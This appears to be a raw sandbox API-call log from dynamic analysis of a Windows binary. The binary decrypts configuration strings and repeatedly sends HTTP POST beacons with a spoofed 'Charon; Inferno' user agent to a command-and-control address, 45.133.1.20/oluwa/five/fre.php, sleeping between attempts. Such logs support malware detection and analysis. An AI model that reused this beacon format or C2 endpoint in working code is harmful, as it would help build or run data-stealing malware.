CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0192.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0192.878] GetProcessHeap () returned 0x6a0000 [0192.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0192.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.880] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0192.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.882] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0192.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.883] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0192.883] GetProcessHeap () returned 0x6a0000 [0192.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0192.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.887] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0192.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.888] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0192.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0192.889] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0192.889] GetProcessHeap () returned 0x6a0000 [0192.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0192.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.891] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0192.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.892] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0192.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.893] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0192.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.894] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0192.894] GetProcessHeap () returned 0x6a0000 [0192.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0192.894] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0192.894] GetProcessHeap () returned 0x6a0000 [0192.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0192.895] socket (af=2, type=1, protocol=6) returned 0x4b4 [0192.895] connect (s=0x4b4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0192.922] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0192.922] GetProcessHeap () returned 0x6a0000 [0192.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0192.922] GetProcessHeap () returned 0x6a0000 [0192.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0192.923] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.925] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0192.925] GetProcessHeap () returned 0x6a0000 [0192.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0192.925] GetProcessHeap () returned 0x6a0000 [0192.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.925] GetProcessHeap () returned 0x6a0000 [0192.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0192.925] GetProcessHeap () returned 0x6a0000 [0192.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0192.926] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0192.927] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0192.928] GetProcessHeap () returned 0x6a0000 [0192.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0192.928] GetProcessHeap () returned 0x6a0000 [0192.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0192.928] send (s=0x4b4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0192.929] send (s=0x4b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0192.929] GetProcessHeap () returned 0x6a0000 [0192.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0192.929] recv (in: s=0x4b4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0193.050] GetProcessHeap () returned 0x6a0000 [0193.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0193.051] GetProcessHeap () returned 0x6a0000 [0193.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0193.051] GetProcessHeap () returned 0x6a0000 [0193.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0193.052] GetProcessHeap () returned 0x6a0000 [0193.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0193.053] closesocket (s=0x4b4) returned 0 [0193.053] GetProcessHeap () returned 0x6a0000 [0193.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0193.053] GetProcessHeap () returned 0x6a0000 [0193.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.054] GetProcessHeap () returned 0x6a0000 [0193.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0193.054] GetProcessHeap () returned 0x6a0000 [0193.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0193.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1298) returned 0x4b4 [0193.057] Sleep (dwMilliseconds=0xea60) [0193.059] GetProcessHeap () returned 0x6a0000 [0193.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0193.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.061] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.068] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0193.076] GetProcessHeap () returned 0x6a0000 [0193.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5aa8 [0193.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.078] CryptImportKey (in: hProv=0x6bf168, pbData=0x6c5aa8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0193.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.096] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.097] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.097] GetProcessHeap () returned 0x6a0000 [0193.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5aa8 | out: hHeap=0x6a0000) returned 1 [0193.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.099] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0193.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.100] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0193.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.118] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0193.118] GetProcessHeap () returned 0x6a0000 [0193.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.119] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.120] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.122] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.123] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.123] GetProcessHeap () returned 0x6a0000 [0193.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0193.123] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.123] GetProcessHeap () returned 0x6a0000 [0193.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0193.124] GetProcessHeap () returned 0x6a0000 [0193.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.124] GetProcessHeap () returned 0x6a0000 [0193.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0193.125] GetProcessHeap () returned 0x6a0000 [0193.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0193.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.127] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.138] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0193.153] GetProcessHeap () returned 0x6a0000 [0193.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0193.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.154] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0193.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.157] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.168] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.168] GetProcessHeap () returned 0x6a0000 [0193.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0193.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.174] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0193.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.177] CryptDestroyKey (hKey=0x6ad060) returned 1 [0193.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.179] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0193.179] GetProcessHeap () returned 0x6a0000 [0193.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.181] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0193.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.183] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0193.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.184] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0193.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.185] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0193.185] GetProcessHeap () returned 0x6a0000 [0193.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0193.185] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0193.185] GetProcessHeap () returned 0x6a0000 [0193.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0193.185] socket (af=2, type=1, protocol=6) returned 0x4b8 [0193.186] connect (s=0x4b8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0193.212] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0193.212] GetProcessHeap () returned 0x6a0000 [0193.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0193.213] GetProcessHeap () returned 0x6a0000 [0193.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0193.214] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.214] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0193.215] GetProcessHeap () returned 0x6a0000 [0193.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0193.215] GetProcessHeap () returned 0x6a0000 [0193.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.215] GetProcessHeap () returned 0x6a0000 [0193.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0193.215] GetProcessHeap () returned 0x6a0000 [0193.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0193.216] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.217] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0193.217] GetProcessHeap () returned 0x6a0000 [0193.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0193.217] GetProcessHeap () returned 0x6a0000 [0193.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.218] send (s=0x4b8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0193.218] send (s=0x4b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0193.218] GetProcessHeap () returned 0x6a0000 [0193.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0193.219] recv (in: s=0x4b8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0193.297] GetProcessHeap () returned 0x6a0000 [0193.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0193.297] GetProcessHeap () returned 0x6a0000 [0193.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0193.298] GetProcessHeap () returned 0x6a0000 [0193.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0193.300] GetProcessHeap () returned 0x6a0000 [0193.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0193.300] closesocket (s=0x4b8) returned 0 [0193.301] GetProcessHeap () returned 0x6a0000 [0193.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0193.301] GetProcessHeap () returned 0x6a0000 [0193.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.301] GetProcessHeap () returned 0x6a0000 [0193.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0193.302] GetProcessHeap () returned 0x6a0000 [0193.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0193.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12ac) returned 0x4b8 [0193.305] Sleep (dwMilliseconds=0xea60) [0193.306] GetProcessHeap () returned 0x6a0000 [0193.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0193.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.308] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.314] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0193.321] GetProcessHeap () returned 0x6a0000 [0193.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0193.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.323] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0193.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.324] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.326] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.326] GetProcessHeap () returned 0x6a0000 [0193.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0193.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.328] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0193.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.329] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0193.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.329] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0193.329] GetProcessHeap () returned 0x6a0000 [0193.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.331] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.332] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.338] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.339] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.339] GetProcessHeap () returned 0x6a0000 [0193.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0193.340] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.340] GetProcessHeap () returned 0x6a0000 [0193.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0193.340] GetProcessHeap () returned 0x6a0000 [0193.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.341] GetProcessHeap () returned 0x6a0000 [0193.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0193.341] GetProcessHeap () returned 0x6a0000 [0193.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0193.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0193.358] GetProcessHeap () returned 0x6a0000 [0193.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0193.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.359] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0193.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 